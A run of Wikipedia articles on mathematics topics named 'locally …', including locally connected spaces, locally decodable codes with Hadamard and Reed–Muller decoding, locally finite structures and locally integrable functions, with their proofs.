A space X {\displaystyle X} is called locally path connected at x {\displaystyle x} [ 1 ] if every neighborhood of x {\displaystyle x} contains a path connected open neighborhood of x {\displaystyle x} , that is, if the point x {\displaystyle x} has a neighborhood base consisting of path connected open sets. A locally path connected space [ 3 ] [ 1 ] is a space that is locally path connected at each of its points.
Locally path connected spaces are locally connected. The converse does not hold (see the lexicographic order topology on the unit square ).
A space X {\displaystyle X} is called connected im kleinen at x {\displaystyle x} [ 4 ] [ 5 ] or weakly locally connected at x {\displaystyle x} [ 6 ] if every neighborhood of x {\displaystyle x} contains a connected (not necessarily open) neighborhood of x {\displaystyle x} , that is, if the point x {\displaystyle x} has a neighborhood base consisting of connected sets. A space is called weakly locally connected if it is weakly locally connected at each of its points; as indicated below, this concept is in fact the same as being locally connected.
A space that is locally connected at x {\displaystyle x} is connected im kleinen at x . {\displaystyle x.} The converse does not hold, as shown for example by a certain infinite union of decreasing broom spaces , that is connected im kleinen at a particular point, but not locally connected at that point. [ 7 ] [ 8 ] [ 9 ] However, if a space is connected im kleinen at each of its points, it is locally connected. [ 10 ]
A space X {\displaystyle X} is said to be path connected im kleinen at x {\displaystyle x} [ 5 ] if every neighborhood of x {\displaystyle x} contains a path connected (not necessarily open) neighborhood of x {\displaystyle x} , that is, if the point x {\displaystyle x} has a neighborhood base consisting of path connected sets.
A space that is locally path connected at x {\displaystyle x} is path connected im kleinen at x . {\displaystyle x.} The converse does not hold, as shown by the same infinite union of decreasing broom spaces as above. However, if a space is path connected im kleinen at each of its points, it is locally path connected. [ 11 ] [ better source needed ]
A first-countable Hausdorff space ( X , τ ) {\displaystyle (X,\tau )} is locally path-connected if and only if τ {\displaystyle \tau } is equal to the final topology on X {\displaystyle X} induced by the set C ( [ 0 , 1 ] ; X ) {\displaystyle C([0,1];X)} of all continuous paths [ 0 , 1 ] → ( X , τ ) . {\displaystyle [0,1]\to (X,\tau ).}
Theorem — A space is locally connected if and only if it is weakly locally connected. [ 10 ]
For the non-trivial direction, assume X {\displaystyle X} is weakly locally connected. To show it is locally connected, it is enough to show that the connected components of open sets are open.
Let U {\displaystyle U} be open in X {\displaystyle X} and let C {\displaystyle C} be a connected component of U . {\displaystyle U.} Let x {\displaystyle x} be an element of C . {\displaystyle C.} Then U {\displaystyle U} is a neighborhood of x {\displaystyle x} so that there is a connected neighborhood V {\displaystyle V} of x {\displaystyle x} contained in U . {\displaystyle U.} Since V {\displaystyle V} is connected and contains x , {\displaystyle x,} V {\displaystyle V} must be a subset of C {\displaystyle C} (the connected component containing x {\displaystyle x} ). Therefore x {\displaystyle x} is an interior point of C . {\displaystyle C.} Since x {\displaystyle x} was an arbitrary point of C , {\displaystyle C,} C {\displaystyle C} is open in X . {\displaystyle X.} Therefore, X {\displaystyle X} is locally connected.
The following result follows almost immediately from the definitions but will be quite useful:
Lemma: Let X be a space, and { Y i } {\displaystyle \{Y_{i}\}} a family of subsets of X . Suppose that ⋂ i Y i {\displaystyle \bigcap _{i}Y_{i}} is nonempty. Then, if each Y i {\displaystyle Y_{i}} is connected (respectively, path connected) then the union ⋃ i Y i {\displaystyle \bigcup _{i}Y_{i}} is connected (respectively, path connected). [ 16 ]
Now consider two relations on a topological space X : for x , y ∈ X , {\displaystyle x,y\in X,} write:
Evidently both relations are reflexive and symmetric. Moreover, if x and y are contained in a connected (respectively, path connected) subset A and y and z are connected in a connected (respectively, path connected) subset B , then the Lemma implies that A ∪ B {\displaystyle A\cup B} is a connected (respectively, path connected) subset containing x , y and z . Thus each relation is an equivalence relation , and defines a partition of X into equivalence classes . We consider these two partitions in turn.
For x in X , the set C x {\displaystyle C_{x}} of all points y such that y ≡ c x {\displaystyle y\equiv _{c}x} is called the connected component of x . [ 17 ] The Lemma implies that C x {\displaystyle C_{x}} is the unique maximal connected subset of X containing x . [ 18 ] Since the closure of C x {\displaystyle C_{x}} is also a connected subset containing x , [ 19 ] [ 20 ] it follows that C x {\displaystyle C_{x}} is closed. [ 21 ]
If X has only finitely many connected components, then each component is the complement of a finite union of closed sets and therefore open. In general, the connected components need not be open, since, e.g., there exist totally disconnected spaces (i.e., C x = { x } {\displaystyle C_{x}=\{x\}} for all points x ) that are not discrete, like Cantor space. However, the connected components of a locally connected space are also open, and thus are clopen sets . [ 22 ] It follows that a locally connected space X is a topological disjoint union ∐ C x {\displaystyle \coprod C_{x}} of its distinct connected components. Conversely, if for every open subset U of X , the connected components of U are open, then X admits a base of connected sets and is therefore locally connected. [ 23 ]
Similarly x in X , the set P C x {\displaystyle PC_{x}} of all points y such that y ≡ p c x {\displaystyle y\equiv _{pc}x} is called the path component of x . [ 24 ] As above, P C x {\displaystyle PC_{x}} is also the union of all path connected subsets of X that contain x , so by the Lemma is itself path connected. Because path connected sets are connected, we have P C x ⊆ C x {\displaystyle PC_{x}\subseteq C_{x}} for all x ∈ X . {\displaystyle x\in X.}
However the closure of a path connected set need not be path connected: for instance, the topologist's sine curve is the closure of the open subset U consisting of all points (x,sin(x)) with x > 0 , and U , being homeomorphic to an interval on the real line, is certainly path connected. Moreover, the path components of the topologist's sine curve C are U , which is open but not closed, and C ∖ U , {\displaystyle C\setminus U,} which is closed but not open.
A space is locally path connected if and only if for all open subsets U , the path components of U are open. [ 24 ] Therefore the path components of a locally path connected space give a partition of X into pairwise disjoint open sets. It follows that an open connected subspace of a locally path connected space is necessarily path connected. [ 25 ] Moreover, if a space is locally path connected, then it is also locally connected, so for all x ∈ X , {\displaystyle x\in X,} C x {\displaystyle C_{x}} is connected and open, hence path connected, that is, C x = P C x . {\displaystyle C_{x}=PC_{x}.} That is, for a locally path connected space the components and path components coincide.
Let X be a topological space. We define a third relation on X : x ≡ q c y {\displaystyle x\equiv _{qc}y} if there is no separation of X into open sets A and B such that x is an element of A and y is an element of B . This is an equivalence relation on X and the equivalence class Q C x {\displaystyle QC_{x}} containing x is called the quasicomponent of x . [ 18 ]
Q C x {\displaystyle QC_{x}} can also be characterized as the intersection of all clopen subsets of X that contain x . [ 18 ] Accordingly Q C x {\displaystyle QC_{x}} is closed; in general it need not be open.
Evidently C x ⊆ Q C x {\displaystyle C_{x}\subseteq QC_{x}} for all x ∈ X . {\displaystyle x\in X.} [ 18 ] Overall we have the following containments among path components, components and quasicomponents at x : P C x ⊆ C x ⊆ Q C x . {\displaystyle PC_{x}\subseteq C_{x}\subseteq QC_{x}.}
If X is locally connected, then, as above, C x {\displaystyle C_{x}} is a clopen set containing x , so Q C x ⊆ C x {\displaystyle QC_{x}\subseteq C_{x}} and thus Q C x = C x . {\displaystyle QC_{x}=C_{x}.} Since local path connectedness implies local connectedness, it follows that at all points x of a locally path connected space we have P C x = C x = Q C x . {\displaystyle PC_{x}=C_{x}=QC_{x}.}
Another class of spaces for which the quasicomponents agree with the components is the class of compact Hausdorff spaces. [ 26 ] | https://en.wikipedia.org/wiki/Locally_connected_space |
A locally decodable code ( LDC ) is an error-correcting code that allows a single bit of the original message to be decoded with high probability by only examining (or querying) a small number of bits of a possibly corrupted codeword . [ 1 ] [ 2 ] [ 3 ] This property could be useful, say, in a context where information is being transmitted over a noisy channel, and only a small subset of the data is required at a particular time and there is no need to decode the entire message at once. Locally decodable codes are not a subset of locally testable codes , though there is some overlap between the two. [ 4 ]
Codewords are generated from the original message using an algorithm that introduces a certain amount of redundancy into the codeword; thus, the codeword is always longer than the original message. This redundancy is distributed across the codeword and allows the original message to be recovered with good probability even in the presence of errors. The more redundant the codeword, the more resilient it is against errors, and the fewer queries required to recover a bit of the original message.
More formally, a ( q , δ , ϵ ) {\displaystyle (q,\delta ,\epsilon )} -locally decodable code encodes an n {\displaystyle n} -bit message x {\displaystyle x} to an N {\displaystyle N} -bit codeword C ( x ) {\displaystyle C(x)} such that any bit x i {\displaystyle x_{i}} of the message can be recovered with probability 1 − ϵ {\displaystyle 1-\epsilon } by using a randomized decoding algorithm that queries only q {\displaystyle q} bits of the codeword C ( x ) {\displaystyle C(x)} , even if up to δ N {\displaystyle \delta N} locations of the codeword have been corrupted.
Furthermore, a perfectly smooth local decoder is a decoder such that, in addition to always generating the correct output given access to an uncorrupted codeword, for every j ∈ [ q ] {\displaystyle j\in [q]} and i ∈ [ n ] {\displaystyle i\in [n]} the j t h {\displaystyle j^{th}} query to recover the i t h {\displaystyle i^{th}} bit is uniform over [ N ] {\displaystyle [N]} . [ 5 ] (The notation [ y ] {\displaystyle [y]} denotes the set { 1 , … , y } {\displaystyle \{1,\ldots ,y\}} ). Informally, this means that the set of queries required to decode any given bit are uniformly distributed over the codeword.
Local list decoders are another interesting subset of local decoders. List decoding is useful when a codeword is corrupted in more than δ / 2 {\displaystyle \delta /2} places, where δ {\displaystyle \delta } is the minimum Hamming distance between two codewords. In this case, it is no longer possible to identify exactly which original message has been encoded, since there could be multiple codewords within δ {\displaystyle \delta } distance of the corrupted codeword. However, given a radius ϵ {\displaystyle \epsilon } , it is possible to identify the set of messages that encode to codewords that are within ϵ {\displaystyle \epsilon } of the corrupted codeword. An upper bound on the size of the set of messages can be determined by δ {\displaystyle \delta } and ϵ {\displaystyle \epsilon } . [ 6 ]
Locally decodable codes can also be concatenated, where a message is encoded first using one scheme, and the resulting codeword is encoded again using a different scheme. (Note that, in this context, concatenation is the term used by scholars to refer to what is usually called composition ; see [ 5 ] ). This might be useful if, for example, the first code has some desirable properties with respect to rate, but it has some undesirable property, such as producing a codeword over a non-binary alphabet. The second code can then transform the result of the first encoding over a non-binary alphabet to a binary alphabet. The final encoding is still locally decodable, and requires additional steps to decode both layers of encoding. [ 7 ]
The rate of a code refers to the ratio between its message length and codeword length: | x | | C ( x ) | {\displaystyle {\frac {|x|}{|C(x)|}}} , and the number of queries required to recover 1 bit of the message is called the query complexity of a code.
The rate of a code is inversely related to the query complexity, but the exact shape of this tradeoff is a major open problem . [ 8 ] [ 9 ] It is known that there are no LDCs that query the codeword in only one position, and that the optimal codeword size for query complexity 2 is exponential in the size of the original message. [ 8 ] However, there are no known tight lower bounds for codes with query complexity greater than 2. Approaching the tradeoff from the side of codeword length, the only known codes with codeword length proportional to message length have query complexity k ϵ {\displaystyle k^{\epsilon }} for ϵ > 0 {\displaystyle \epsilon >0} [ 8 ] [ needs update ] There are also codes in between, that have codewords polynomial in the size of the original message and polylogarithmic query complexity. [ 8 ]
Locally decodable codes have applications to data transmission and storage, complexity theory, data structures, derandomization, theory of fault tolerant computation, and private information retrieval schemes. [ 9 ]
Locally decodable codes are especially useful for data transmission over noisy channels. The Hadamard code (a special case of Reed Muller codes) was used in 1971 by Mariner 9 to transmit pictures of Mars back to Earth. It was chosen over a 5-repeat code (where each bit is repeated 5 times) because, for roughly the same number of bits transmitted per pixel, it had a higher capacity for error correction. (The Hadamard code falls under the general umbrella of forward error correction , and just happens to be locally decodable; the actual algorithm used to decode the transmission from Mars was a generic error-correction scheme.) [ 10 ]
LDCs are also useful for data storage, where the medium may become partially corrupted over time, or the reading device is subject to errors. In both cases, an LDC will allow for the recovery of information despite errors, provided that there are relatively few. In addition, LDCs do not require that the entire original message be decoded; a user can decode a specific portion of the original message without needing to decode the entire thing. [ 11 ]
One of the applications of locally decodable codes in complexity theory is hardness amplification. Using LDCs with polynomial codeword length and polylogarithmic query complexity, one can take a function L : { 0 , 1 } n → { 0 , 1 } {\displaystyle L:\{0,1\}^{n}\rightarrow \{0,1\}} that is hard to solve on worst case inputs and design a function L ′ : { 0 , 1 } N → { 0 , 1 } {\displaystyle L':\{0,1\}^{N}\rightarrow \{0,1\}} that is hard to compute on average case inputs.
Consider L {\displaystyle L} limited to only length t {\displaystyle t} inputs. Then we can see L {\displaystyle L} as a binary string of length 2 t {\displaystyle 2^{t}} , where each bit is L ( x ) {\displaystyle L(x)} for each x ∈ { 0 , 1 } t {\displaystyle x\in \{0,1\}^{t}} . We can use a polynomial length locally decodable code C {\displaystyle C} with polylogarithmic query complexity that tolerates some constant fraction of errors to encode the string that represents L {\displaystyle L} to create a new string of length 2 O ( t ) = 2 t ′ {\displaystyle 2^{O(t)}=2^{t'}} . We think of this new string as defining a new problem L ′ {\displaystyle L'} on length t ′ {\displaystyle t'} inputs. If L ′ {\displaystyle L'} is easy to solve on average, that is, we can solve L ′ {\displaystyle L'} correctly on a large fraction 1 − ϵ {\displaystyle 1-\epsilon } of inputs, then by the properties of the LDC used to encode it, we can use L ′ {\displaystyle L'} to probabilistically compute L {\displaystyle L} on all inputs. Thus, a solution to L ′ {\displaystyle L'} for most inputs would allow us to solve L {\displaystyle L} on all inputs, contradicting our assumption that L {\displaystyle L} is hard on worst case inputs. [ 5 ] [ 8 ] [ 12 ]
A private information retrieval scheme allows a user to retrieve an item from a server in possession of a database without revealing which item is retrieved. One common way of ensuring privacy is to have k {\displaystyle k} separate, non-communicating servers, each with a copy of the database. Given an appropriate scheme, the user can make queries to each server that individually do not reveal which bit the user is looking for, but which together provide enough information that the user can determine the particular bit of interest in the database. [ 3 ] [ 11 ]
One can easily see that locally decodable codes have applications in this setting. A general procedure to produce a k {\displaystyle k} -server private information scheme from a perfectly smooth k {\displaystyle k} -query locally decodable code is as follows:
Let C {\displaystyle C} be a perfectly smooth LDC that encodes n {\displaystyle n} -bit messages to N {\displaystyle N} -bit codewords. As a preprocessing step, each of the k {\displaystyle k} servers S 1 , … , S k {\displaystyle S_{1},\ldots ,S_{k}} encodes the n {\displaystyle n} -bit database x {\displaystyle x} with the code C {\displaystyle C} , so each server now stores the N {\displaystyle N} -bit codeword C ( x ) {\displaystyle C(x)} . A user interested in obtaining the i t h {\displaystyle i^{th}} bit of x {\displaystyle x} randomly generates a set of k {\displaystyle k} queries q 1 , … q k {\displaystyle q_{1},\ldots q_{k}} such that x i {\displaystyle x_{i}} can be computed from C ( x ) q 1 , … C ( x ) q k {\displaystyle C(x)_{q_{1}},\ldots C(x)_{q_{k}}} using the local decoding algorithm A {\displaystyle A} for C {\displaystyle C} . The user sends each query to a different server, and each server responds with the bit requested. The user then uses A {\displaystyle A} to compute x i {\displaystyle x_{i}} from the responses. [ 8 ] [ 11 ] Because the decoding algorithm is perfectly smooth, each query q j {\displaystyle q_{j}} is uniformly distributed over the codeword; thus, no individual server can gain any information about the user's intentions, so the protocol is private as long as the servers do not communicate. [ 11 ]
The Hadamard (or Walsh-Hadamard) code is an example of a simple locally decodable code that maps a string of length k {\displaystyle k} to a codeword of length 2 k {\displaystyle 2^{k}} . The codeword for a string x ∈ { 0 , 1 } k {\displaystyle x\in \{0,1\}^{k}} is constructed as follows: for every a j ∈ { 0 , 1 } k {\displaystyle a_{j}\in \{0,1\}^{k}} , the j t h {\displaystyle j^{th}} bit of the codeword is equal to x ⊙ a j {\displaystyle x\odot a_{j}} , where x ⊙ y = ∑ i = 1 k x i y i {\displaystyle x\odot y=\sum \limits _{i=1}^{k}x_{i}y_{i}} (mod 2). It is easy to see that every codeword has a Hamming distance of n 2 {\displaystyle {\frac {n}{2}}} from every other codeword.
The local decoding algorithm has query complexity 2, and the entire original message can be decoded with good probability if the codeword is corrupted in less than 1 4 {\displaystyle {\frac {1}{4}}} of its bits. For ρ < 1 4 {\displaystyle \rho <{\frac {1}{4}}} , if the codeword is corrupted in a ρ {\displaystyle \rho } fraction of places, a local decoding algorithm can recover the i t h {\displaystyle i^{th}} bit of the original message with probability 1 − 2 ρ {\displaystyle 1-2\rho } .
Proof: Given a codeword H {\displaystyle H} and an index i {\displaystyle i} , the algorithm to recover the i t h {\displaystyle i^{th}} bit of the original message x {\displaystyle x} works as follows:
Let e j {\displaystyle e^{j}} refer to the vector in { 0 , 1 } k {\displaystyle \{0,1\}^{k}} that has 1 in the j t h {\displaystyle j^{th}} position and 0s elsewhere. For y ∈ { 0 , 1 } k {\displaystyle y\in \{0,1\}^{k}} , f ( y ) {\displaystyle f(y)} denotes the single bit in H {\displaystyle H} that corresponds to x ⊙ y {\displaystyle x\odot y} . The algorithm chooses a random vector y ∈ { 0 , 1 } k {\displaystyle y\in \{0,1\}^{k}} and the vector y ′ = y ⊕ e i {\displaystyle y'=y\oplus e^{i}} (where ⊕ {\displaystyle \oplus } denotes bitwise XOR ). The algorithm outputs f ( y ) ⊕ f ( y ′ ) {\displaystyle f(y)\oplus f(y')} (mod 2).
Correctness: By linearity,
( x ⊙ y ) ⊕ ( x ⊙ y ′ ) = ( x ⊙ y ) ⊕ ( x ⊙ ( y ⊕ e i ) ) = ( x ⊙ y ) ⊕ ( x ⊙ y ) ⊕ ( x ⊙ e i ) = x ⊙ e i {\displaystyle (x\odot y)\oplus (x\odot y')=(x\odot y)\oplus (x\odot (y\oplus e^{i}))=(x\odot y)\oplus (x\odot y)\oplus (x\odot e^{i})=x\odot e^{i}}
But ( x ⊙ e i ) = x i {\displaystyle (x\odot e^{i})=x_{i}} , so we just need to show that f ( y ) = x ⊙ y {\displaystyle f(y)=x\odot y} and f ( y ′ ) = x ⊙ y ′ {\displaystyle f(y')=x\odot y'} with good probability.
Since y {\displaystyle y} and y ′ {\displaystyle y'} are uniformly distributed (even though they are dependent), the union bound implies that f ( y ) = x ⊙ y {\displaystyle f(y)=x\odot y} and f ( y ′ ) = x ⊙ y ′ {\displaystyle f(y')=x\odot y'} with probability at least 1 − 2 ρ {\displaystyle 1-2\rho } . Note: to amplify the probability of success, one can repeat the procedure with different random vectors and take the majority answer. [ 13 ]
The main idea behind local decoding of Reed-Muller codes is polynomial interpolation . The key concept behind a Reed-Muller code is a multivariate polynomial of degree d {\displaystyle d} on l {\displaystyle l} variables. The message is treated as the evaluation of a polynomial at a set of predefined points. To encode these values, a polynomial is extrapolated from them, and the codeword is the evaluation of that polynomial on all possible points. At a high level, to decode a point of this polynomial, the decoding algorithm chooses a set S {\displaystyle S} of points on a line that passes through the point of interest x {\displaystyle x} . It then queries the codeword for the evaluation of the polynomial on points in S {\displaystyle S} and interpolates that polynomial. Then it is simple to evaluate the polynomial at the point that will yield x {\displaystyle x} . This roundabout way of evaluating x {\displaystyle x} is useful because (a) the algorithm can be repeated using different lines through the same point to improve the probability of correctness, and (b) the queries are uniformly distributed over the codeword.
More formally, let F {\displaystyle \mathbb {F} } be a finite field , and let l , d {\displaystyle l,d} be numbers with d < | F | {\displaystyle d<|\mathbb {F} |} . The Reed-Muller code with parameters F , l , d {\displaystyle \mathbb {F} ,l,d} is the function RM : F ( l + d d ) → F | F | l {\displaystyle \mathbb {F} ^{\binom {l+d}{d}}\rightarrow \mathbb {F} ^{|\mathbb {F} |^{l}}} that maps every l {\displaystyle l} -variable polynomial P {\displaystyle P} over F {\displaystyle \mathbb {F} } of total degree d {\displaystyle d} to the values of P {\displaystyle P} on all the inputs in F l {\displaystyle \mathbb {F} ^{l}} . That is, the input is a polynomial of the form P ( x 1 , … , x l ) = ∑ i 1 + … + i l ≤ d c i 1 , … , i l x 1 i 1 x 2 i 2 ⋯ x l i l {\displaystyle P(x_{1},\ldots ,x_{l})=\sum \limits _{i_{1}+\ldots +i_{l}\leq d}c_{i_{1},\ldots ,i_{l}}x_{1}^{i_{1}}x_{2}^{i_{2}}\cdots x_{l}^{i_{l}}} specified by the interpolation of the ( l + d d ) {\displaystyle {\binom {l+d}{d}}} values of the predefined points and the output is the sequence { P ( x 1 , … , x l ) } {\displaystyle \{P(x_{1},\ldots ,x_{l})\}} for every x 1 , … , x l ∈ F {\displaystyle x_{1},\ldots ,x_{l}\in \mathbb {F} } . [ 14 ]
To recover the value of a degree d {\displaystyle d} polynomial at a point w ∈ F n {\displaystyle w\in \mathbb {F} ^{n}} , the local decoder shoots a random affine line through w {\displaystyle w} . Then it picks d + 1 {\displaystyle d+1} points on that line, which it uses to interpolate the polynomial and then evaluate it at the point where the result is w {\displaystyle w} . To do so, the algorithm picks a vector v ∈ F n {\displaystyle v\in \mathbb {F} ^{n}} uniformly at random and considers the line L = { w + λ v ∣ λ ∈ F } {\displaystyle L=\{w+\lambda v\mid \lambda \in \mathbb {F} \}} through w {\displaystyle w} . The algorithm picks an arbitrary subset S {\displaystyle S} of F {\displaystyle \mathbb {F} } , where | S | = d + 1 {\displaystyle |S|=d+1} , and queries coordinates of the codeword that correspond to points w + λ v {\displaystyle w+\lambda v} for all λ ∈ S {\displaystyle \lambda \in S} and obtains values { e λ } {\displaystyle \{e_{\lambda }\}} . Then it uses polynomial interpolation to recover the unique univariate polynomial h {\displaystyle h} with degree less than or equal to d {\displaystyle d} such that h ( λ ) = e λ {\displaystyle h(\lambda )=e_{\lambda }} for all λ ∈ S {\displaystyle \lambda \in S} . Then, to get the value of w {\displaystyle w} , it just evaluates h ( 0 ) {\displaystyle h(0)} . To recover a single value of the original message, one chooses w {\displaystyle w} to be one of the points that defines the polynomial. [ 8 ] [ 14 ]
Each individual query is distributed uniformly at random over the codeword. Thus, if the codeword is corrupted in at most a δ {\displaystyle \delta } fraction of locations, by the union bound, the probability that the algorithm samples only uncorrupted coordinates (and thus correctly recovers the bit) is at least 1 − ( d + 1 ) δ {\displaystyle 1-(d+1)\delta } . [ 8 ] For other decoding algorithms, see. [ 8 ] | https://en.wikipedia.org/wiki/Locally_decodable_code |
In mathematics , particularly topology , collections of subsets are said to be locally discrete if they look like they have precisely one element from a local point of view. The study of locally discrete collections is worthwhile as Bing's metrization theorem shows.
Let X be a topological space . A collection {G a } of subsets of X is said to be locally discrete, if each point of the space has a neighbourhood intersecting at most one element of the collection. A collection of subsets of X is said to be countably locally discrete, if it is the countable union of locally discrete collections.
1. Locally discrete collections are always locally finite . See the page on local finiteness.
2. If a collection of subsets of a topological space X is locally discrete, it must satisfy the property that each point of the space belongs to at most one element of the collection. This means that only collections of pairwise disjoint sets can be locally discrete.
3. A Hausdorff space cannot have a locally discrete basis unless it is itself discrete. The same property holds for a T 1 space .
4. The following is known as Bing's metrization theorem:
A space X is metrizable iff it is regular and has a basis that is countably locally discrete.
5. A countable collection of sets is necessarily countably locally discrete. Therefore, if X is a metrizable space with a countable basis , one implication of Bing's metrization theorem holds. In fact, Bing's metrization theorem is almost a corollary of the Nagata-Smirnov theorem . | https://en.wikipedia.org/wiki/Locally_discrete_collection |
In mathematics , a linear operator f : V → V {\displaystyle f:V\to V} is called locally finite if the space V {\displaystyle V} is the union of a family of finite-dimensional f {\displaystyle f} - invariant subspaces . [ 1 ] [ 2 ] : 40
In other words, there exists a family { V i | i ∈ I } {\displaystyle \{V_{i}\vert i\in I\}} of linear subspaces of V {\displaystyle V} , such that we have the following:
An equivalent condition only requires V {\displaystyle V} to be the spanned by finite-dimensional f {\displaystyle f} -invariant subspaces. [ 3 ] [ 4 ] If V {\displaystyle V} is also a Hilbert space , sometimes an operator is called locally finite when the sum of the { V i | i ∈ I } {\displaystyle \{V_{i}\vert i\in I\}} is only dense in V {\displaystyle V} . [ 2 ] : 78–79
This linear algebra -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Locally_finite_operator |
In mathematics, a locally finite poset is a partially ordered set P such that for all x , y ∈ P , the interval [ x , y ] consists of finitely many elements.
Given a locally finite poset P we can define its incidence algebra . Elements of the incidence algebra are functions ƒ that assign to each interval [ x , y ] of P a real number ƒ ( x , y ). These functions form an associative algebra with a product defined by
There is also a definition of incidence coalgebra .
In theoretical physics a locally finite poset is also called a causal set and has been used as a model for spacetime .
This algebra -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Locally_finite_poset |
In universal algebra , a variety of algebras means the class of all algebraic structures of a given signature satisfying a given set of identities. One calls a variety locally finite if every finitely generated algebra has finite cardinality , or equivalently, if every finitely generated free algebra has finite cardinality.
The variety of Boolean algebras constitutes a famous example. The free Boolean algebra on n generators has cardinality 2 2 n , consisting of the n -ary operations 2 n →2.
The variety of sets constitutes a degenerate example: the free set on n generators has cardinality n , consisting of just the generators themselves.
The variety of pointed sets constitutes a trivial example: the free pointed set on n generators has cardinality n +1, consisting of the generators along with the basepoint.
The variety of graphs defined as follows constitutes a combinatorial example. Define a graph G = ( E , s , t ) to be a set E of edges and unary operations s , t of source and target satisfying s ( s ( e )) = t ( s ( e )) and s ( t ( e )) = t ( t ( e )). Vertices are those edges in the (common) image of s and t . The free graph on n generators has cardinality 3 n and consists of n edges e each with two endpoints s ( e ) and t ( e ). Graphs with nontrivial incidence relations arise as quotients of free graphs, most usefully by identifying vertices.
The variety of sets and the variety of graphs so defined each forms a presheaf category and hence a topos . This is not the case for the variety of Boolean algebras or of pointed sets.
This algebra -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Locally_finite_variety |
In mathematics , a locally integrable function (sometimes also called locally summable function ) [ 1 ] is a function which is integrable (so its integral is finite) on every compact subset of its domain of definition . The importance of such functions lies in the fact that their function space is similar to L p spaces , but its members are not required to satisfy any growth restriction on their behavior at the boundary of their domain (at infinity if the domain is unbounded): in other words, locally integrable functions can grow arbitrarily fast at the domain boundary, but are still manageable in a way similar to ordinary integrable functions.
Definition 1 . [ 2 ] Let Ω be an open set in the Euclidean space R n {\displaystyle \mathbb {R} ^{n}} and f : Ω → C {\displaystyle \mathbb {C} } be a Lebesgue measurable function . If f on Ω is such that
i.e. its Lebesgue integral is finite on all compact subsets K of Ω , [ 3 ] then f is called locally integrable . The set of all such functions is denoted by L 1,loc (Ω) :
where f | K {\textstyle \left.f\right|_{K}} denotes the restriction of f to the set K .
The classical definition of a locally integrable function involves only measure theoretic and topological [ 4 ] concepts and can be carried over abstract to complex-valued functions on a topological measure space ( X , Σ, μ ) : [ 5 ] however, since the most common application of such functions is to distribution theory on Euclidean spaces, [ 2 ] all the definitions in this and the following sections deal explicitly only with this important case.
Definition 2 . [ 6 ] Let Ω be an open set in the Euclidean space R n {\displaystyle \mathbb {R} ^{n}} . Then a function f : Ω → C {\displaystyle \mathbb {C} } such that
for each test function φ ∈ C ∞ c (Ω) is called locally integrable , and the set of such functions is denoted by L 1,loc (Ω) . Here C ∞ c (Ω) denotes the set of all infinitely differentiable functions φ : Ω → R {\displaystyle \mathbb {R} } with compact support contained in Ω .
This definition has its roots in the approach to measure and integration theory based on the concept of continuous linear functional on a topological vector space , developed by the Nicolas Bourbaki school: [ 7 ] it is also the one adopted by Strichartz (2003) and by Maz'ya & Shaposhnikova (2009 , p. 34). [ 8 ] This "distribution theoretic" definition is equivalent to the standard one, as the following lemma proves:
Lemma 1 . A given function f : Ω → C {\displaystyle \mathbb {C} } is locally integrable according to Definition 1 if and only if it is locally integrable according to Definition 2 , i.e.
If part : Let φ ∈ C ∞ c (Ω) be a test function. It is bounded by its supremum norm || φ || ∞ , measurable, and has a compact support , let's call it K . Hence
by Definition 1 .
Only if part : Let K be a compact subset of the open set Ω . We will first construct a test function φ K ∈ C ∞ c (Ω) which majorises the indicator function χ K of K .
The usual set distance [ 9 ] between K and the boundary ∂Ω is strictly greater than zero, i.e.
hence it is possible to choose a real number δ such that Δ > 2 δ > 0 (if ∂Ω is the empty set, take Δ = ∞ ). Let K δ and K 2 δ denote the closed δ -neighborhood and 2 δ -neighborhood of K , respectively. They are likewise compact and satisfy
Now use convolution to define the function φ K : Ω → R {\displaystyle \mathbb {R} } by
where φ δ is a mollifier constructed by using the standard positive symmetric one . Obviously φ K is non-negative in the sense that φ K ≥ 0 , infinitely differentiable, and its support is contained in K 2 δ , in particular it is a test function. Since φ K ( x ) = 1 for all x ∈ K , we have that χ K ≤ φ K .
Let f be a locally integrable function according to Definition 2 . Then
Since this holds for every compact subset K of Ω , the function f is locally integrable according to Definition 1 . □
Definition 3 . [ 10 ] Let Ω be an open set in the Euclidean space R n {\displaystyle \mathbb {R} ^{n}} and f : Ω → C {\displaystyle \mathbb {C} } be a Lebesgue measurable function. If, for a given p with 1 ≤ p ≤ +∞ , f satisfies
i.e., it belongs to L p ( K ) for all compact subsets K of Ω , then f is called locally p - integrable or also p - locally integrable . [ 10 ] The set of all such functions is denoted by L p ,loc (Ω) :
An alternative definition, completely analogous to the one given for locally integrable functions, can also be given for locally p -integrable functions: it can also be and proven equivalent to the one in this section. [ 11 ] Despite their apparent higher generality, locally p -integrable functions form a subset of locally integrable functions for every p such that 1 < p ≤ +∞ . [ 12 ]
Apart from the different glyphs which may be used for the uppercase "L", [ 13 ] there are few variants for the notation of the set of locally integrable functions
Theorem 1 . [ 14 ] L p ,loc is a complete metrizable space : its topology can be generated by the following metric :
where { ω k } k ≥1 is a family of non empty open sets such that
In references ( Gilbarg & Trudinger 2001 , p. 147), ( Maz'ya & Poborchi 1997 , p. 5), ( Maz'ja 1985 , p. 6) and ( Maz'ya 2011 , p. 2), this theorem is stated but not proved on a formal basis: [ 15 ] a complete proof of a more general result, which includes it, is found in ( Meise & Vogt 1997 , p. 40).
Theorem 2 . Every function f belonging to L p (Ω) , 1 ≤ p ≤ +∞ , where Ω is an open subset of R n {\displaystyle \mathbb {R} ^{n}} , is locally integrable.
Proof . The case p = 1 is trivial, therefore in the sequel of the proof it is assumed that 1 < p ≤ +∞ . Consider the characteristic function χ K of a compact subset K of Ω : then, for p ≤ +∞ ,
where
Then for any f belonging to L p (Ω) , by Hölder's inequality , the product fχ K is integrable i.e. belongs to L 1 (Ω) and
therefore
Note that since the following inequality is true
the theorem is true also for functions f belonging only to the space of locally p -integrable functions, therefore the theorem implies also the following result.
Corollary 1 . Every function f {\displaystyle f} in L p , l o c ( Ω ) {\displaystyle L_{p,loc}(\Omega )} , 1 < p ≤ ∞ {\displaystyle 1<p\leq \infty } , is locally integrable, i. e. belongs to L 1 , l o c ( Ω ) {\displaystyle L_{1,loc}(\Omega )} .
